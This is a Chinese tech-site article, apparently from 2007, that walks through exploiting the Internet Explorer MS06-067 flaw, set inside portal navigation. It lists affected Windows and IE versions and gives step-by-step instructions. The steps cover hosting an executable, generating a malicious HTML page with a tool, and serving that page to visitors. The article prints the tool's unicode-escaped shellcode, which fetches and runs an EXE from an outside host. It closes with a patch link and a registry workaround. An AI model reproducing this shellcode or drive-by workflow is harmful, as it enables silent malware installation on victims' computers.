频道直达 - 专题 - 新闻 - 技巧 - 组网 - 开发 - 安全 - web编程 - 图像 - 操作系统 - 数据库 - 教育 - 旅游 - 健康 - 时尚 - 驱动 - 软件 - 游戏 - 多媒体 - ERP - 讨论组
阅读排行榜 | 收藏此文 | 收藏本站 | 设为首页

令人汗颜的IE最新漏洞(MS06-067)测试

来源:1steam 作者:IceskYsl@1st 出处:巧巧读书 2007-03-28 进入讨论组

这个漏洞太恐怖了,恐怖的让我不敢写出来,考虑到马上网上这样的工具都会泛滥,还是提前告诉大家比较好,我不详细的利用过程,如果你接触过类似的,肯定是会使用的,再次奉劝大家,测试为主,不要乱挂马,

危害他人!

受影响的系统:

Microsoft Windows 2000 Service Pack 4

Microsoft Windows XP Service Pack 2

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2003

Microsoft Windows Server 2003 Service Pack 1

Microsoft Windows Server 2003(用于基于 Itanium 的系统)

Microsoft Windows Server 2003 SP1(用于基于 Itanium 的系统)

Microsoft Windows Server 2003 x64 Edition

受影响软件:

Microsoft Internet Explorer 6.0 SP1

Microsoft Internet Explorer 6.0

Microsoft Internet Explorer 5.0.1 SP4

不受影响软件:

Internet Explorer 7

利用过程如下,

1、首先把一个你需要运行的EXE文件放在网上,得到地址: http://www.1steam.cn/tools/jhzj.exe(我这里测试用的是按钮突破专家)。

2、接着看下这个生成工具(LION提供的,谢)的使用方法:

Usage: e:/ms_exp/06067/ms06067.exe [htmlfile]--就是你的EXE的路径,如我这里的“按钮突破专家”的地址:

[htmlfile]--需要生成的HTML文件的名称,如我这里的1st.html

3、生成过程,按照上面的格式就可以生成了,过程如下: 

E:\Ms_exp\06067>ms06067 http://www.1steam.cn/tools/jhzj.exe 1st.html
[+] download url:http://www.1steam.cn/tools/jhzj.exe
[+] exploit file:1st.html
"%ua3e9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c"
"%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000"
"%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u9516"
"%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456"
"%u04c7%u5c03%u2e61%uc765%u0344%u7804%u0065%u3300"
"%u50c0%u5350%u5057%u56ff%u8b10%u50dc%uff53%u0856"
"%u56ff%u510c%u8b56%u3c75%u748b%u782e%uf503%u8b56"
"%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be"
"%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775"
"%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd"
"%u8b04%uc503%u5eab%uc359%u58e8%uffff%u8eff%u0e4e"
"%uc1ec%ue579%u98b8%u8afe%uef0e%ue0ce%u3660%u2f1a"
"%u6870%u7474%u3a70%u2f2f%u7777%u2e77%u7331%u6574"
"%u6d61%u632e%u2f6e%u6f74%u6c6f%u2f73%u686a%u6a7a"
"%u652e%u6578%u0000";
[+] exploit write to 1st.html success!

看到这句:[+] exploit write to 1st.html success!就说明成功了。可以去ms06067.exe的目录下,看到生成的HTML文件1st.html。

4、把这个HTML文件放在网上,给人家访问就可以了,我这里的这个测试网页地址在:

http://www.1steam.cn/modiy/1st.html ,你可以打开看看效果,如果你能看到运行的“按钮突破专家”,说明成功。

5、修补

官方已经除了补丁,地址在:http://www.microsoft.co.ke/china ... letin/MS06-067.mspx。

或者修补如下(LION提供的,再谢):

请将以下文本粘贴于记事本等文本编辑器中。然后,使用.reg文件扩展名保存文件: 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet 
Explorer\ActiveX Compatibility\{D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}]
"Compatibility Flags"=dword:00000400

双击此.reg文件将其应用到各个系统。URL:http://www.qqread.com/news/l305016.html 更多文章 更多内容请看漏洞专区浏览器的漏洞专题,或进入讨论组讨论。

更多专题 【深 度 阅 读】 相 关 文 章
收藏此文】【 】【打印】【关闭
较早的文章:Windows假冒代理漏洞可以劫持系统

较新的文章:触目惊心 挂马、肉鸡、僵尸、黑社会
相关图文阅读
频道图文推荐
健 康 咨 询
时 尚 咨 询
巧巧读书宗旨
相关专题
更多排行>>
讨论组问题推荐
站内各频道最新更新文档
站内最新制作专题
热门关键字导读
Photoshop教 程照片处理 照片制作 PS快捷键 抠图
计 算 机 故 障XP系统修复
艺 术 与 设 计设计 流媒体 设计欣赏 边框
计 算 机 安 全ARP
站内频道文章精选
新闻资讯
操作系统
桌面开发
数据库
电脑技巧
常用软件
网络程序开发
图像处理
巧巧电脑频道编辑信箱  告诉我们您想看的专题或文章